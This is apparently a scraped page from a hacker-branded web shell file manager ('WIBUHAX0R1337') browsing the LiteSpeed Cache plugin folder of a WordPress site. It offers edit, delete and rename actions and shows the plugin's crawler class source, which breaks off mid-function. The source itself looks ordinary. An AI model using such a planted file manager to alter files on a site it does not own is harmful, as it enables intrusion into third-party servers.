-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
xtrasolutionsco.com
/
wp-content
/
plugins
/
litespeed-cache
/
src
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
cdn
--
NONE
data_structure
--
NONE
activation.cls.php
17.437KB
Edit File
Delete File
Rename
admin-display.cls.php
48.119KB
Edit File
Delete File
Rename
admin-settings.cls.php
11.116KB
Edit File
Delete File
Rename
admin.cls.php
5.046KB
Edit File
Delete File
Rename
api.cls.php
10.437KB
Edit File
Delete File
Rename
avatar.cls.php
8.682KB
Edit File
Delete File
Rename
base.cls.php
34.58KB
Edit File
Delete File
Rename
cdn.cls.php
15.918KB
Edit File
Delete File
Rename
cloud.cls.php
65.796KB
Edit File
Delete File
Rename
conf.cls.php
19.53KB
Edit File
Delete File
Rename
control.cls.php
24.349KB
Edit File
Delete File
Rename
core.cls.php
21.015KB
Edit File
Delete File
Rename
crawler-map.cls.php
19.428KB
Edit File
Delete File
Rename
crawler.cls.php
42.195KB
Edit File
Delete File
Rename
css.cls.php
15.271KB
Edit File
Delete File
Rename
data.cls.php
16.49KB
Edit File
Delete File
Rename
data.upgrade.func.php
3.073KB
Edit File
Delete File
Rename
db-optm.cls.php
10.341KB
Edit File
Delete File
Rename
debug2.cls.php
14.17KB
Edit File
Delete File
Rename
doc.cls.php
4.066KB
Edit File
Delete File
Rename
error.cls.php
7.383KB
Edit File
Delete File
Rename
esi.cls.php
27.182KB
Edit File
Delete File
Rename
file.cls.php
10.569KB
Edit File
Delete File
Rename
gui.cls.php
36.503KB
Edit File
Delete File
Rename
htaccess.cls.php
24.002KB
Edit File
Delete File
Rename
import.cls.php
4.292KB
Edit File
Delete File
Rename
import.preset.cls.php
5.501KB
Edit File
Delete File
Rename
lang.cls.php
15.06KB
Edit File
Delete File
Rename
localization.cls.php
3.439KB
Edit File
Delete File
Rename
media.cls.php
40.368KB
Edit File
Delete File
Rename
metabox.cls.php
5.316KB
Edit File
Delete File
Rename
object-cache-wp.cls.php
24.667KB
Edit File
Delete File
Rename
object-cache.cls.php
20.301KB
Edit File
Delete File
Rename
object.lib.php
13.31KB
Edit File
Delete File
Rename
optimize.cls.php
38.663KB
Edit File
Delete File
Rename
optimizer.cls.php
9.414KB
Edit File
Delete File
Rename
placeholder.cls.php
14.187KB
Edit File
Delete File
Rename
purge.cls.php
33.95KB
Edit File
Delete File
Rename
report.cls.php
6.119KB
Edit File
Delete File
Rename
rest.cls.php
8.637KB
Edit File
Delete File
Rename
root.cls.php
13.987KB
Edit File
Delete File
Rename
router.cls.php
20.568KB
Edit File
Delete File
Rename
str.cls.php
3.15KB
Edit File
Delete File
Rename
tag.cls.php
9.259KB
Edit File
Delete File
Rename
task.cls.php
6.132KB
Edit File
Delete File
Rename
tool.cls.php
4.217KB
Edit File
Delete File
Rename
ucss.cls.php
14.374KB
Edit File
Delete File
Rename
utility.cls.php
21.763KB
Edit File
Delete File
Rename
vary.cls.php
20.201KB
Edit File
Delete File
Rename
vpi.cls.php
9.363KB
Edit File
Delete File
Rename
<?php // phpcs:ignoreFile /** * The crawler class * * @since 1.1.0 */ namespace LiteSpeed; defined('WPINC') || exit(); class Crawler extends Root { const LOG_TAG = 'πΈοΈ'; const TYPE_REFRESH_MAP = 'refresh_map'; const TYPE_EMPTY = 'empty'; const TYPE_BLACKLIST_EMPTY = 'blacklist_empty'; const TYPE_BLACKLIST_DEL = 'blacklist_del'; const TYPE_BLACKLIST_ADD = 'blacklist_add'; const TYPE_START = 'start'; const TYPE_RESET = 'reset'; const USER_AGENT = 'lscache_walker'; const FAST_USER_AGENT = 'lscache_runner'; const CHUNKS = 10000; const STATUS_WAIT = 'W'; const STATUS_HIT = 'H'; const STATUS_MISS = 'M'; const STATUS_BLACKLIST = 'B'; const STATUS_NOCACHE = 'N'; private $_sitemeta = 'meta.data'; private $_resetfile; private $_end_reason; private $_ncpu = 1; private $_server_ip; private $_crawler_conf = array( 'cookies' => array(), 'headers' => array(), 'ua' => '', ); private $_crawlers = array(); private $_cur_threads = -1; private $_max_run_time; private $_cur_thread_time; private $_map_status_list = array( 'H' => array(), 'M' => array(), 'B' => array(), 'N' => array(), ); protected $_summary; /** * Initialize crawler, assign sitemap path * * @since 1.1.0 */ public function __construct() { if (is_multisite()) { $this->_sitemeta = 'meta' . get_current_blog_id() . '.data'; } $this->_resetfile = LITESPEED_STATIC_DIR . '/crawler/' . $this->_sitemeta . '.reset'; $this->_summary = self::get_summary(); $this->_ncpu = $this->_get_server_cpu(); $this->_server_ip = $this->conf(Base::O_SERVER_IP); self::debug('Init w/ CPU cores=' . 
$this->_ncpu); } /** * Try get server CPUs * * @since 5.2 */ private function _get_server_cpu() { $cpuinfo_file = '/proc/cpuinfo'; $setting_open_dir = ini_get('open_basedir'); if ($setting_open_dir) { return 1; } // Server has limit try { if (!@is_file($cpuinfo_file)) { return 1; } } catch (\Exception $e) { return 1; } $cpuinfo = file_get_contents($cpuinfo_file); preg_match_all('/^processor/m', $cpuinfo, $matches); return count($matches[0]) ?: 1; } /** * Check whether the current crawler is active/runable/useable/enabled/want it to work or not * * @since 4.3 */ public function is_active( $curr ) { $bypass_list = self::get_option('bypass_list', array()); return !in_array($curr, $bypass_list); } /** * Toggle the current crawler's activeness state, i.e., runable/useable/enabled/want it to work or not, and return the updated state * * @since 4.3 */ public function toggle_activeness( $curr ) { // param type: int $bypass_list = self::get_option('bypass_list', array()); if (in_array($curr, $bypass_list)) { // when the ith opt was off / in the bypassed list, turn it on / remove it from the list unset($bypass_list[array_search($curr, $bypass_list)]); $bypass_list = array_values($bypass_list); self::update_option('bypass_list', $bypass_list); return true; } else { // when the ith opt was on / not in the bypassed list, turn it off / add it to the list $bypass_list[] = (int) $curr; self::update_option('bypass_list', $bypass_list); return false; } } /** * Clear bypassed list * * @since 4.3 * @access public */ public function clear_disabled_list() { self::update_option('bypass_list', array()); $msg = __('Crawler disabled list is cleared! All crawlers are set to active! ', 'litespeed-cache'); Admin_Display::note($msg); self::debug('All crawlers are set to active...... 
'); } /** * Overwrite get_summary to init elements * * @since 3.0 * @access public */ public static function get_summary( $field = false ) { $_default = array( 'list_size' => 0, 'last_update_time' => 0, 'curr_crawler' => 0, 'curr_crawler_beginning_time' => 0, 'last_pos' => 0, 'last_count' => 0, 'last_crawled' => 0, 'last_start_time' => 0, 'last_status' => '', 'is_running' => 0, 'end_reason' => '', 'meta_save_time' => 0, 'pos_reset_check' => 0, 'done' => 0, 'this_full_beginning_time' => 0, 'last_full_time_cost' => 0, 'last_crawler_total_cost' => 0, 'crawler_stats' => array(), // this will store all crawlers hit/miss crawl status ); wp_cache_delete('alloptions', 'options'); // ensure the summary is current $summary = parent::get_summary(); $summary = array_merge($_default, $summary); if (!$field) { return $summary; } if (array_key_exists($field, $summary)) { return $summary[$field]; } return null; } /** * Overwrite save_summary * * @since 3.0 * @access public */ public static function save_summary( $data = false, $reload = false, $overwrite = false ) { $instance = self::cls(); $instance->_summary['meta_save_time'] = time(); if (!$data) { $data = $instance->_summary; } parent::save_summary($data, $reload, $overwrite); File::save(LITESPEED_STATIC_DIR . '/crawler/' . 
$instance->_sitemeta, \json_encode($data), true); } /** * Cron start async crawling * * @since 5.5 */ public static function start_async_cron() { Task::async_call('crawler'); } /** * Manually start async crawling * * @since 5.5 */ public static function start_async() { Task::async_call('crawler_force'); $msg = __('Started async crawling', 'litespeed-cache'); Admin_Display::success($msg); } /** * Ajax crawl handler * * @since 5.5 */ public static function async_handler( $manually_run = false ) { self::debug('------------async-------------start_async_handler'); // check_ajax_referer('async_crawler', 'nonce'); self::start($manually_run); } /** * Proceed crawling * * @since 1.1.0 * @access public */ public static function start( $manually_run = false ) { if (!Router::can_crawl()) { self::debug('......crawler is NOT allowed by the server admin......'); return false; } if ($manually_run) { self::debug('......crawler manually ran......'); } self::cls()->_crawl_data($manually_run); } /** * Crawling start * * @since 1.1.0 * @access private */ private function _crawl_data( $manually_run ) { if (!defined('LITESPEED_LANE_HASH')) { define('LITESPEED_LANE_HASH', Str::rrand(8)); } if ($this->_check_valid_lane()) { $this->_take_over_lane(); } else { self::debug('β οΈ lane in use'); return; // if ($manually_run) { // self::debug('......crawler started (manually_rund)......'); // Log pid to prevent from multi running // if (defined('LITESPEED_CLI')) { // Take over lane // self::debug('β οΈβ οΈβ οΈ Forced take over lane (CLI)'); // $this->_take_over_lane(); // } // } } self::debug('......crawler started......'); // for the first time running if (!$this->_summary || !Data::cls()->tb_exist('crawler') || !Data::cls()->tb_exist('crawler_blacklist')) { $this->cls('Crawler_Map')->gen(); } // if finished last time, regenerate sitemap if ($this->_summary['done'] === 'touchedEnd') { // check whole crawling interval $last_finished_at = $this->_summary['last_full_time_cost'] + 
$this->_summary['this_full_beginning_time']; if (!$manually_run && time() - $last_finished_at < $this->conf(Base::O_CRAWLER_CRAWL_INTERVAL)) { self::debug('Cron abort: cache warmed already.'); // if not reach whole crawling interval, exit $this->Release_lane(); return; } self::debug('TouchedEnd. regenerate sitemap....'); $this->cls('Crawler_Map')->gen(); } $this->list_crawlers(); // Skip the crawlers that in bypassed list while (!$this->is_active($this->_summary['curr_crawler']) && $this->_summary['curr_crawler'] < count($this->_crawlers)) { self::debug('Skipped the Crawler #' . $this->_summary['curr_crawler'] . ' ......'); ++$this->_summary['curr_crawler']; } if ($this->_summary['curr_crawler'] >= count($this->_crawlers)) { $this->_end_reason = 'end'; $this->_terminate_running(); $this->Release_lane(); return; } // In case crawlers are all done but not reload, reload it if (empty($this->_summary['curr_crawler']) || empty($this->_crawlers[$this->_summary['curr_crawler']])) { $this->_summary['curr_crawler'] = 0; $this->_summary['crawler_stats'][$this->_summary['curr_crawler']] = array(); } $res = $this->load_conf(); if (!$res) { self::debug('Load conf failed'); $this->_terminate_running(); $this->Release_lane(); return; } try { $this->_engine_start(); $this->Release_lane(); } catch (\Exception $e) { self::debug('π ' . $e->getMessage()); } } /** * Load conf before running crawler * * @since 3.0 * @access private */ private function load_conf() { $this->_crawler_conf['base'] = site_url(); $current_crawler = $this->_crawlers[$this->_summary['curr_crawler']]; /** * Check cookie crawler * * @since 2.8 */ foreach ($current_crawler as $k => $v) { if (strpos($k, 'cookie:') !== 0) { continue; } if ($v == '_null') { continue; } $this->_crawler_conf['cookies'][substr($k, 7)] = $v; } /** * Set WebP simulation * * @since 1.9.1 */ if (!empty($current_crawler['webp'])) { $this->_crawler_conf['headers'][] = 'Accept: image/' . ($this->conf(Base::O_IMG_OPTM_WEBP) == 2 ? 
'avif' : 'webp') . ',*/*'; } /** * Set mobile crawler * * @since 2.8 */ if (!empty($current_crawler['mobile'])) { $this->_crawler_conf['ua'] = 'Mobile iPhone'; } /** * Limit delay to use server setting * * @since 1.8.3 */ $this->_crawler_conf['run_delay'] = 500; // microseconds if (defined('LITESPEED_CRAWLER_USLEEP') && constant('LITESPEED_CRAWLER_USLEEP') > $this->_crawler_conf['run_delay']) { $this->_crawler_conf['run_delay'] = constant('LITESPEED_CRAWLER_USLEEP'); } if (!empty($_SERVER[Base::ENV_CRAWLER_USLEEP]) && $_SERVER[Base::ENV_CRAWLER_USLEEP] > $this->_crawler_conf['run_delay']) { $this->_crawler_conf['run_delay'] = $_SERVER[Base::ENV_CRAWLER_USLEEP]; } $this->_crawler_conf['run_duration'] = $this->get_crawler_duration(); $this->_crawler_conf['load_limit'] = $this->conf(Base::O_CRAWLER_LOAD_LIMIT); if (!empty($_SERVER[Base::ENV_CRAWLER_LOAD_LIMIT_ENFORCE])) { $this->_crawler_conf['load_limit'] = $_SERVER[Base::ENV_CRAWLER_LOAD_LIMIT_ENFORCE]; } elseif (!empty($_SERVER[Base::ENV_CRAWLER_LOAD_LIMIT]) && $_SERVER[Base::ENV_CRAWLER_LOAD_LIMIT] < $this->_crawler_conf['load_limit']) { $this->_crawler_conf['load_limit'] = $_SERVER[Base::ENV_CRAWLER_LOAD_LIMIT]; } if ($this->_crawler_conf['load_limit'] == 0) { self::debug('π Terminated crawler due to load limit set to 0'); return false; } /** * Set role simulation * * @since 1.9.1 */ if (!empty($current_crawler['uid'])) { if (!$this->_server_ip) { self::debug('π Terminated crawler due to Server IP not set'); return false; } // Get role simulation vary name $vary_name = $this->cls('Vary')->get_vary_name(); $vary_val = $this->cls('Vary')->finalize_default_vary($current_crawler['uid']); $this->_crawler_conf['cookies'][$vary_name] = $vary_val; $this->_crawler_conf['cookies']['litespeed_hash'] = Router::cls()->get_hash($current_crawler['uid']); } return true; } /** * Get crawler duration allowance * * @since 7.0 */ public function get_crawler_duration() { $RUN_DURATION = defined('LITESPEED_CRAWLER_DURATION') ? 
constant('LITESPEED_CRAWLER_DURATION') : 900; if ($RUN_DURATION > 900) { $RUN_DURATION = 900; // reset to default value if defined in conf file is higher than 900 seconds for security enhancement } return $RUN_DURATION; } /** * Start crawler * * @since 1.1.0 * @access private */ private function _engine_start() { // check if is running // if ($this->_summary['is_running'] && time() - $this->_summary['is_running'] < $this->_crawler_conf['run_duration']) { // $this->_end_reason = 'stopped'; // self::debug('The crawler is running.'); // return; // } // check current load $this->_adjust_current_threads(); if ($this->_cur_threads == 0) { $this->_end_reason = 'stopped_highload'; self::debug('Stopped due to heavy load.'); return; } // log started time self::save_summary(array( 'last_start_time' => time() )); // set time limit $maxTime = (int) ini_get('max_execution_time'); self::debug('ini_get max_execution_time=' . $maxTime); if ($maxTime == 0) { $maxTime = 300; // hardlimit } else { $maxTime -= 5; } if ($maxTime >= $this->_crawler_conf['run_duration']) { $maxTime = $this->_crawler_conf['run_duration']; self::debug('Use run_duration setting as max_execution_time=' . $maxTime); } elseif (ini_set('max_execution_time', $this->_crawler_conf['run_duration'] + 15) !== false) { $maxTime = $this->_crawler_conf['run_duration']; self::debug('ini_set max_execution_time=' . $maxTime); } self::debug('final max_execution_time=' . $maxTime); $this->_max_run_time = $maxTime + time(); // mark running $this->_prepare_running(); // run crawler $this->_do_running(); $this->_terminate_running(); } /** * Get server load * * @since 5.5 */ public function get_server_load() { /** * If server is windows, exit * * @see https://wordpress.org/support/topic/crawler-keeps-causing-crashes/ */ if (!function_exists('sys_getloadavg')) { return -1; } $curload = sys_getloadavg(); $curload = $curload[0]; self::debug('Server load: ' . 
$curload); return $curload; } /** * Adjust threads dynamically * * @since 1.1.0 * @access private */ private function _adjust_current_threads() { $curload = $this->get_server_load(); if ($curload == -1) { self::debug('set threads=0 due to func sys_getloadavg not exist!'); $this->_cur_threads = 0; return; } $curload /= $this->_ncpu; // $curload = 1; $CRAWLER_THREADS = defined('LITESPEED_CRAWLER_THREADS') ? constant('LITESPEED_CRAWLER_THREADS') : 3; if ($this->_cur_threads == -1) { // init if ($curload > $this->_crawler_conf['load_limit']) { $curthreads = 0; } elseif ($curload >= $this->_crawler_conf['load_limit'] - 1) { $curthreads = 1; } else { $curthreads = intval($this->_crawler_conf['load_limit'] - $curload); if ($curthreads > $CRAWLER_THREADS) { $curthreads = $CRAWLER_THREADS; } } } else { // adjust $curthreads = $this->_cur_threads; if ($curload >= $this->_crawler_conf['load_limit'] + 1) { sleep(5); // sleep 5 secs if ($curthreads >= 1) { --$curthreads; } } elseif ($curload >= $this->_crawler_conf['load_limit']) { // if ( $curthreads > 1 ) {// if already 1, keep --$curthreads; // } } elseif ($curload + 1 < $this->_crawler_conf['load_limit']) { if ($curthreads < $CRAWLER_THREADS) { ++$curthreads; } } } // $log = 'set current threads = ' . $curthreads . ' previous=' . $this->_cur_threads // . ' max_allowed=' . $CRAWLER_THREADS . ' load_limit=' . $this->_crawler_conf[ 'load_limit' ] . ' current_load=' . 
$curload; $this->_cur_threads = $curthreads; $this->_cur_thread_time = time(); } /** * Mark running status * * @since 1.1.0 * @access private */ private function _prepare_running() { $this->_summary['is_running'] = time(); $this->_summary['done'] = 0; // reset done status $this->_summary['last_status'] = 'prepare running'; $this->_summary['last_crawled'] = 0; // Current crawler starttime mark if ($this->_summary['last_pos'] == 0) { $this->_summary['curr_crawler_beginning_time'] = time(); } if ($this->_summary['curr_crawler'] == 0 && $this->_summary['last_pos'] == 0) { $this->_summary['this_full_beginning_time'] = time(); $this->_summary['list_size'] = $this->cls('Crawler_Map')->count_map(); } if ($this->_summary['end_reason'] == 'end' && $this->_summary['last_pos'] == 0) { $this->_summary['crawler_stats'][$this->_summary['curr_crawler']] = array(); } self::save_summary(); } /** * Take over lane * * @since 6.1 */ private function _take_over_lane() { self::debug('Take over lane as lane is free: ' . $this->json_local_path() . '.pid'); File::save($this->json_local_path() . '.pid', LITESPEED_LANE_HASH); } /** * Update lane file * * @since 6.1 */ private function _touch_lane() { touch($this->json_local_path() . '.pid'); } /** * Release lane file * * @since 6.1 */ public function Release_lane() { $lane_file = $this->json_local_path() . '.pid'; if (!file_exists($lane_file)) { return; } self::debug('Release lane'); unlink($lane_file); } /** * Check if lane is used by other crawlers * * @since 6.1 */ private function _check_valid_lane( $strict_mode = false ) { // Check lane hash $lane_file = $this->json_local_path() . 
'.pid'; if ($strict_mode) { if (!file_exists($lane_file)) { self::debug("lane file not existed, strict mode is false [file] $lane_file"); return false; } } $pid = File::read($lane_file); if ($pid && LITESPEED_LANE_HASH != $pid) { // If lane file is older than 1h, ignore if (time() - filemtime($lane_file) > 3600) { self::debug('Lane file is older than 1h, releasing lane'); $this->Release_lane(); return true; } return false; } return true; } /** * Test port for simulator * * @since 7.0 * @access private * @return bool true if success and can continue crawling, false if failed and need to stop */ private function _test_port() { if (!$this->_server_ip) { if (empty($this->_crawlers[$this->_summary['curr_crawler']]['uid'])) { self::debug('Bypass test port as Server IP is not set'); return true; } self::debug('β Server IP not set'); return false; } if (defined('LITESPEED_CRAWLER_LOCAL_PORT')) { self::debug('β LITESPEED_CRAWLER_LOCAL_PORT already defined'); return true; } // Don't repeat testing in 120s if (!empty($this->_summary['test_port_tts']) && time() - $this->_summary['test_port_tts'] < 120) { if (!empty($this->_summary['test_port'])) { self::debug('β Use tested local port: ' . $this->_summary['test_port']); define('LITESPEED_CRAWLER_LOCAL_PORT', $this->_summary['test_port']); return true; } return false; } $this->_summary['test_port_tts'] = time(); self::save_summary(); $options = $this->_get_curl_options(); $home = home_url(); File::save(LITESPEED_STATIC_DIR . '/crawler/test_port.html', $home, true); $url = LITESPEED_STATIC_URL . '/crawler/test_port.html'; $parsed_url = parse_url($url); if (empty($parsed_url['host'])) { self::debug('β Test port failed, invalid URL: ' . $url); return false; } $resolved = $parsed_url['host'] . ':443:' . $this->_server_ip; $options[CURLOPT_RESOLVE] = array( $resolved ); $options[CURLOPT_DNS_USE_GLOBAL_CACHE] = false; $options[CURLOPT_HEADER] = false; self::debug('Test local 443 port for ' . 
$resolved); $ch = curl_init(); curl_setopt_array($ch, $options); curl_setopt($ch, CURLOPT_URL, $url); $result = curl_exec($ch); $test_result = false; if (curl_errno($ch) || $result !== $home) { if (curl_errno($ch)) { self::debug('β Test port curl error: [errNo] ' . curl_errno($ch) . ' [err] ' . curl_error($ch)); } elseif ($result !== $home) { self::debug('β Test port response is wrong: ' . $result); } self::debug('β Test local 443 port failed, try port 80'); // Try port 80 $resolved = $parsed_url['host'] . ':80:' . $this->_server_ip; $options[CURLOPT_RESOLVE] = array( $resolved ); $url = str_replace('https://', 'http://', $url); if (!in_array('X-Forwarded-Proto: https', $options[CURLOPT_HTTPHEADER])) { $options[CURLOPT_HTTPHEADER][] = 'X-Forwarded-Proto: https'; } // $options[CURLOPT_HTTPHEADER][] = 'X-Forwarded-SSL: on'; $ch = curl_init(); curl_setopt_array($ch, $options); curl_setopt($ch, CURLOPT_URL, $url); $result = curl_exec($ch); if (curl_errno($ch)) { self::debug('β Test port curl error: [errNo] ' . curl_errno($ch) . ' [err] ' . curl_error($ch)); } elseif ($result !== $home) { self::debug('β Test port response is wrong: ' . $result); } else { self::debug('β Test local 80 port successfully'); define('LITESPEED_CRAWLER_LOCAL_PORT', 80); $this->_summary['test_port'] = 80; $test_result = true; } // self::debug('Response data: ' . 
$result); // $this->Release_lane(); // exit($result); } else { self::debug('β Tested local 443 port successfully'); define('LITESPEED_CRAWLER_LOCAL_PORT', 443); $this->_summary['test_port'] = 443; $test_result = true; } self::save_summary(); curl_close($ch); return $test_result; } /** * Run crawler * * @since 1.1.0 * @access private */ private function _do_running() { $options = $this->_get_curl_options(true); // If is role simulator and not defined local port, check port once $test_result = $this->_test_port(); if (!$test_result) { $this->_end_reason = 'port_test_failed'; self::debug('β Test port failed, crawler stopped.'); return; } while ($urlChunks = $this->cls('Crawler_Map')->list_map(self::CHUNKS, $this->_summary['last_pos'])) { // self::debug('$urlChunks=' . count($urlChunks) . ' $this->_cur_threads=' . $this->_cur_threads); // start crawling $urlChunks = array_chunk($urlChunks, $this->_cur_threads); // self::debug('$urlChunks after array_chunk: ' . count($urlChunks)); foreach ($urlChunks as $rows) { if (!$this->_check_valid_lane(true)) { $this->_end_reason = 'lane_invalid'; self::debug('π The crawler lane is used by newer crawler.'); throw new \Exception('invalid crawler lane'); } // Update time $this->_touch_lane(); // self::debug('chunk fetching count($rows)= ' . count($rows)); // multi curl $rets = $this->_multi_request($rows, $options); // check result headers foreach ($rows as $row) { // self::debug('chunk fetching 553'); if (empty($rets[$row['id']])) { // If already in blacklist, no curl happened, no corresponding record continue; } // self::debug('chunk fetching 557'); // check response if ($rets[$row['id']]['code'] == 428) { // HTTP/1.1 428 Precondition Required (need to test) $this->_end_reason = 'crawler_disabled'; self::debug('crawler_disabled'); return; } $status = $this->_status_parse($rets[$row['id']]['header'], $rets[$row['id']]['code'], $row['url']); // B or H or M or N(nocache) self::debug('[status] ' . $this->_status2title($status) . 
"\t\t [url] " . $row['url']); $this->_map_status_list[$status][$row['id']] = array( 'url' => $row['url'], 'code' => $rets[$row['id']]['code'], // 201 or 200 or 404 ); if (empty($this->_summary['crawler_stats'][$this->_summary['curr_crawler']][$status])) { $this->_summary['crawler_stats'][$this->_summary['curr_crawler']][$status] = 0; } ++$this->_summary['crawler_stats'][$this->_summary['curr_crawler']][$status]; } // update offset position $_time = time(); $this->_summary['last_count'] = count($rows); $this->_summary['last_pos'] += $this->_summary['last_count']; $this->_summary['last_crawled'] += $this->_summary['last_count']; $this->_summary['last_update_time'] = $_time; $this->_summary['last_status'] = 'updated position'; // self::debug("chunk fetching 604 last_pos:{$this->_summary['last_pos']} last_count:{$this->_summary['last_count']} last_crawled:{$this->_summary['last_crawled']}"); // check duration if ($this->_summary['last_update_time'] > $this->_max_run_time) { $this->_end_reason = 'stopped_maxtime'; self::debug('Terminated due to maxtime'); return; // return __('Stopped due to exceeding defined Maximum Run Time', 'litespeed-cache'); } // make sure at least each 10s save meta & map status once if ($_time - $this->_summary['meta_save_time'] > 10) { $this->_map_status_list = $this->cls('Crawler_Map')->save_map_status($this->_map_status_list, $this->_summary['curr_crawler']); self::save_summary(); } // self::debug('chunk fetching 597'); // check if need to reset pos each 5s if ($_time > $this->_summary['pos_reset_check']) { $this->_summary['pos_reset_check'] = $_time + 5; if (file_exists($this->_resetfile) && unlink($this->_resetfile)) { self::debug('Terminated due to reset file'); $this->_summary['last_pos'] = 0; $this->_summary['curr_crawler'] = 0; $this->_summary['crawler_stats'][$this->_summary['curr_crawler']] = array(); // reset done status $this->_summary['done'] = 0; $this->_summary['this_full_beginning_time'] = 0; $this->_end_reason = 
'stopped_reset'; return; // return __('Stopped due to reset meta position', 'litespeed-cache'); } } // self::debug('chunk fetching 615'); // check loads if ($this->_summary['last_update_time'] - $this->_cur_thread_time > 60) { $this->_adjust_current_threads(); if ($this->_cur_threads == 0) { $this->_end_reason = 'stopped_highload'; self::debug('π Terminated due to highload'); return; // return __('Stopped due to load over limit', 'litespeed-cache'); } } $this->_summary['last_status'] = 'sleeping ' . $this->_crawler_conf['run_delay'] . 'ms'; usleep($this->_crawler_conf['run_delay']); } // self::debug('chunk fetching done'); } // All URLs are done for current crawler $this->_end_reason = 'end'; $this->_summary['crawler_stats'][$this->_summary['curr_crawler']]['W'] = 0; self::debug('Crawler #' . $this->_summary['curr_crawler'] . ' touched end'); } /** * If need to resolve DNS or not * * @since 7.3.0.1 */ private function _should_force_resolve_dns() { if ($this->_server_ip) { return true; } if (!empty($this->_crawler_conf['cookies']) && !empty($this->_crawler_conf['cookies']['litespeed_hash'])) { return true; } return false; } /** * Send multi curl requests * If res=B, bypass request and won't return * * @since 1.1.0 * @access private */ private function _multi_request( $rows, $options ) { if (!function_exists('curl_multi_init')) { exit('curl_multi_init disabled'); } $mh = curl_multi_init(); $CRAWLER_DROP_DOMAIN = defined('LITESPEED_CRAWLER_DROP_DOMAIN') ? constant('LITESPEED_CRAWLER_DROP_DOMAIN') : false; $curls = array(); foreach ($rows as $row) { if (substr($row['res'], $this->_summary['curr_crawler'], 1) == self::STATUS_BLACKLIST) { continue; } if (substr($row['res'], $this->_summary['curr_crawler'], 1) == self::STATUS_NOCACHE) { continue; } if (!function_exists('curl_init')) { exit('curl_init disabled'); } $curls[$row['id']] = curl_init(); // Append URL $url = $row['url']; if ($CRAWLER_DROP_DOMAIN) { $url = $this->_crawler_conf['base'] . 
$row['url']; } // IP resolve if ($this->_should_force_resolve_dns()) { $parsed_url = parse_url($url); // self::debug('Crawl role simulator, required to use localhost for resolve'); if (!empty($parsed_url['host'])) { $dom = $parsed_url['host']; $port = defined('LITESPEED_CRAWLER_LOCAL_PORT') ? LITESPEED_CRAWLER_LOCAL_PORT : '443'; $resolved = $dom . ':' . $port . ':' . $this->_server_ip; $options[CURLOPT_RESOLVE] = array( $resolved ); $options[CURLOPT_DNS_USE_GLOBAL_CACHE] = false; // $options[CURLOPT_PORT] = $port; if ($port == 80) { $url = str_replace('https://', 'http://', $url); if (!in_array('X-Forwarded-Proto: https', $options[CURLOPT_HTTPHEADER])) { $options[CURLOPT_HTTPHEADER][] = 'X-Forwarded-Proto: https'; } } self::debug('Resolved DNS for ' . $resolved); } } curl_setopt($curls[$row['id']], CURLOPT_URL, $url); self::debug('Crawling [url] ' . $url . ($url == $row['url'] ? '' : ' [ori] ' . $row['url'])); curl_setopt_array($curls[$row['id']], $options); curl_multi_add_handle($mh, $curls[$row['id']]); } // execute curl if ($curls) { do { $status = curl_multi_exec($mh, $active); if ($active) { curl_multi_select($mh); } } while ($active && $status == CURLM_OK); } // curl done $ret = array(); foreach ($rows as $row) { if (substr($row['res'], $this->_summary['curr_crawler'], 1) == self::STATUS_BLACKLIST) { continue; } if (substr($row['res'], $this->_summary['curr_crawler'], 1) == self::STATUS_NOCACHE) { continue; } // self::debug('-----debug3'); $ch = $curls[$row['id']]; // Parse header $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $content = curl_multi_getcontent($ch); $header = substr($content, 0, $header_size); $ret[$row['id']] = array( 'header' => $header, 'code' => curl_getinfo($ch, CURLINFO_HTTP_CODE), ); // self::debug('-----debug4'); curl_multi_remove_handle($mh, $ch); curl_close($ch); } // self::debug('-----debug5'); curl_multi_close($mh); // self::debug('-----debug6'); return $ret; } /** * Translate the status to title * * @since 6.0 */ private 
function _status2title( $status ) {
		if ($status == self::STATUS_HIT) {
			return '✅ Hit';
		}
		if ($status == self::STATUS_MISS) {
			return '😊 Miss';
		}
		// No-cache results are reported under the same label as blocklisted ones.
		if ($status == self::STATUS_BLACKLIST || $status == self::STATUS_NOCACHE) {
			return '😅 Blacklisted';
		}
		return '🛸 Unknown';
	}

	/**
	 * Check returned curl header to find if cached or not
	 *
	 * @since  2.0
	 * @access private
	 * @param string $header Raw response header block returned by curl.
	 * @param int    $code   HTTP response code.
	 * @param string $url    Crawled URL, handed to the `litespeed_crawler_disable_blocklist` filter.
	 * @return mixed One of the self::STATUS_* constants.
	 */
	private function _status_parse( $header, $code, $url ) {
		if ($code == 201) {
			return self::STATUS_HIT;
		}

		if (stripos($header, 'X-Litespeed-Cache-Control: no-cache') !== false) {
			// Site owner asked to treat non-cacheable responses as plain misses
			if (defined('LITESPEED_CRAWLER_IGNORE_NONCACHEABLE') && LITESPEED_CRAWLER_IGNORE_NONCACHEABLE) {
				return self::STATUS_MISS;
			}

			// If blacklist is disabled
			if (
				(defined('LITESPEED_CRAWLER_DISABLE_BLOCKLIST') && constant('LITESPEED_CRAWLER_DISABLE_BLOCKLIST')) ||
				apply_filters('litespeed_crawler_disable_blocklist', false, $url)
			) {
				return self::STATUS_MISS;
			}

			return self::STATUS_NOCACHE;
		}

		$_cache_headers = array( 'x-litespeed-cache', 'x-qc-cache', 'x-lsadc-cache' );

		foreach ($_cache_headers as $_header) {
			if (stripos($header, $_header) === false) {
				continue;
			}

			// Order matters: a `bkn` value wins over a `miss` value for the same header name.
			if (stripos($header, $_header . ': bkn') !== false) {
				return self::STATUS_HIT;
			}
			if (stripos($header, $_header . ': miss') !== false) {
				return self::STATUS_MISS;
			}
			return self::STATUS_HIT;
		}

		// No cache header at all. If blacklist is disabled, report a miss instead of blocklisting.
		if (
			(defined('LITESPEED_CRAWLER_DISABLE_BLOCKLIST') && constant('LITESPEED_CRAWLER_DISABLE_BLOCKLIST')) ||
			apply_filters('litespeed_crawler_disable_blocklist', false, $url)
		) {
			return self::STATUS_MISS;
		}

		return self::STATUS_BLACKLIST;
	}

	/**
	 * Get curl_options
	 *
	 * Builds the option array from `$this->_crawler_conf` (`headers`, `ua`, `cookies`).
	 *
	 * @since  1.1.0
	 * @access private
	 * @param bool $crawler_only When true, make sure the user agent starts with self::FAST_USER_AGENT.
	 * @return array Options suitable for curl_setopt_array().
	 */
	private function _get_curl_options( $crawler_only = false ) {
		$CRAWLER_TIMEOUT = defined('LITESPEED_CRAWLER_TIMEOUT') ? constant('LITESPEED_CRAWLER_TIMEOUT') : 30;

		$options = array(
			CURLOPT_RETURNTRANSFER => true,
			CURLOPT_HEADER => true,
